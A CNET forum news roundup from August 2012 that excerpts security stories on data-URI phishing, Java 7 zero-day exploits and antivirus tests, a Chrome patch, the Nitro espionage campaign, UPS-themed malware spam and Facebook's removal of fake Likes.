NEWS - August 31, 2012

Phishing without a webpage - researcher reveals how a link *itself* can be malicious

The need for a reliable place to host your malicious website has been the bane of phishers for much of the last decade.

A researcher at the University of Oslo in Norway says that page-less phishing and other untraceable attacks may be possible, using a tried and true internet communications standard: the uniform resource identifier, or URI.

Henning Klevjer, an information security student at the University of Oslo in Norway, suggests in a just-released research paper that it may be possible for attackers to dispense with phishing sites altogether, embedding their entire scam webpage in an encoded data URI that can be passed around from victim to victim.

URIs are strings of characters that identify a resource. The term encompasses the better-known Uniform Resource Locator (URL) and uniform resource name (URN). However, whereas URLs specify the location of a specific network resource and how it should be accessed (i.e. with HTTP, HyperText Transfer Protocol), URIs are more flexible and can even be used to host the data they "link" to.

Continued :

"Data" URLs used for in-URL phishing
Cybercriminals Could Take Phishing to the Next Level by Using URIs
Discussion is locked
Reply to: NEWS - August 31, 2012
PLEASE NOTE: Do not post advertisements, offensive materials, profanity, or personal attacks. Please remember to be considerate of other members. If you are new to the CNET Forums, please read our CNET Forums FAQ. All submitted content is subject to our Terms of Use.
Reporting: NEWS - August 31, 2012
This post has been flagged and will be reviewed by our staff. Thank you for helping us maintain CNET's great community.
Sorry, there was a problem flagging this post. Please try again now or at a later time.
If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.
- Collapse -
Only 9 of 22 virus scanners block Java exploit

According to an analysis conducted by the AV-Comparatives test lab on behalf of The H's associates at heise Security, less than half of the 22 anti-virus programs tested protect users against the currently circulating Java exploit that targets a highly critical vulnerability in Java version 7 Update 6.

Two versions of the exploit were tested: the basic version that was largely based on the published proof of concept and started the notepad instead of the calculator, and, for the second variant, heise Security added a download routine that writes an EXE file to disk from the internet. The test system was Windows XP that, except in the case of Avast, Microsoft and Panda, had the full versions of the security suites installed. For Avast, Microsoft and Panda, the researchers used the free versions of the products.

Only 9 of the 22 tested products managed to block both variants of the exploit (Avast Free, AVG, Avira, ESET, G Data, Kaspersky, PC Tools, Sophos and Symantec). Twelve virus scanners were found to be unsuccessful (AhnLab, Bitdefender, BullGuard, eScan, F-Secure, Fortinet, GFI-Vipre, Ikarus, McAfee, Panda Cloud Antivirus, Trend Micro and Webroot). Microsoft's free Security Essentials component at least managed to block the basic version of the exploit.

Continued :

- Collapse -
Researchers Find Critical Vulnerability in Java 7 Patch
.. Hours After Release

Security researchers from Poland-based security firm Security Explorations claim to have discovered a vulnerability in the Java 7 security update released Thursday that can be exploited to escape the Java sandbox and execute arbitrary code on the underlying system.

Security Explorations sent a report about the vulnerability to Oracle on Friday together with a proof-of-concept exploit, Adam Gowdiak, the security company's founder and CEO said Friday via email.

The company doesn't plan to release any technical details about the vulnerability publicly until Oracle addresses it, Gowdiak said.

Oracle broke out of its regular four-month patching cycle on Thursday to release Java 7 Update 7, an emergency security update that addressed three vulnerabilities, including two that were being exploited by attackers to infect computers with malware since last week.

Java 7 Update 7 also patched a "security-in-depth issue" which, according to Oracle, was not directly exploitable, but could have been used to aggravate the impact of other vulnerabilities.

Continued :

Oracle patches Java 0-day, researchers say there's another one
Java Users Still Not Safe, Experts Report New Vulnerability to Oracle
- Collapse -
Chrome 21 update closes high-risk security holes

Three high-severity holes have been fixed in Google's latest stable channel update to the Chrome web browser. Version 21.0.1180.89 of Chrome for Windows, Mac OS X and Linux addresses a total of nine vulnerabilities in the web browser, and fixes a number of non-security issues with Flash, developer tools and gradient boxes.

The high severity vulnerabilities include two incidents of bad casting, when handling XSL transforms and run-ins, and a stale buffer appearing when loading URLs. Additionally, the update fixes three medium-risk and three low-risk issues. In total, Google paid security researchers $3,500 for discovering and reporting these holes as part of its Chromium Security Vulnerability Rewards program. As usual, further details about the security holes have not yet been disclosed, in order to allow affected users to update to the new version.

Chrome 21.0.1180.89 is available from for Windows, Mac OS X and Linux; existing users can upgrade using the built-in update function. Chrome is built from Chromium, the open source browser project run by Google.

- Collapse -
The "Nitro" Campaign and Java Zero-Day

From TrendLabs Malware Blog:

The security community has been focused on the new Java zero-day exploits that appear to have been taken from a Chinese exploit pack (known as Gondad or KaiXin) used in targeted attacks by the "Nitro" cyber-espionage campaign and then incorporated into criminal operations using the BlackHole Exploit Kit. While the connections between these developments are starting to emerge, it is important to remember that campaigns, such as Nitro, don't "come back" because they don't go away. The Nitro attackers continued to be active after their activities were documented in 2011.

In fact, before they acquired this Java exploit, the Nitro attackers were continuing to send out emails to their targets with direct links to Poison Ivy executables in early August 2012 (On a related note, another email was spotted in April 2012). [Screenshot: Sample Email]

The file Flashfxp.exe was hosted on one of the same servers that hosted the Java zero-day and Poison Ivy payload, and it connects to ok.{BLOCKED} which resolves to the same IP address, {BLOCKED}.{BLOCKED}..233.244. This is the same address as hello.{BLOCKED}, the domain used as the command and control server for the Poison Ivy payload dropped by the Java zero-day.

Continued :

- Collapse -
Cybercriminals impersonate UPS, serve malware

Dancho Danchev @ the Webroot Threat Blog:

Cybercriminals are currently mass mailing millions of emails impersonating the United Parcel Service (UPS) in an attempt to trick users into downloading and executing the malicious file hosted on a compromised web site.

More details:

Sample screenshot of the spamvertised email: [Screenshot]

Spamvertised URL: hxxp://

Actual download location of the malicious archive: hxxp://

The malware has a: MD5:b702590c01f76f02e2d8d98833d1c95f - detected by 36 out of 42 antivirus scanners as Trojan-Downloader.Win32.Kuluoz.z; TrojanDownloader:Win32/Kuluoz.B

- Collapse -
Facebook puts fraudulent "Likes" on notice

"Scammers, time to tweak your techniques again."

Facebook engineers have rolled out new technology that automatically removes fraudulent Likes that are mass-produced to exaggerate the popularity of a webpage or brand.

The social network recently increased its learning algorithms to detect the spammed endorsements, which are often generated by computers, fake Facebook accounts, or other fraudulent means, the company said on its security blog Friday morning. The post said the inauthentic Likes are a tiny sliver of the overall endorsements on the site; on average, less than one percent of the Likes on any given page are expected to be affected. We're guessing, however, that certain pages—say, some promoting things like male enhancement pills—will be heavily hit.

"These newly improved automated efforts will remove those Likes gained by malware, compromised accounts, deceived users, or purchased bulk Likes," the Facebook post stated. "While we have always had dedicated protections against each of these threats on Facebook, these improved systems have been specifically configured to identify and take action against suspicious Likes."

Continued :

CNET Forums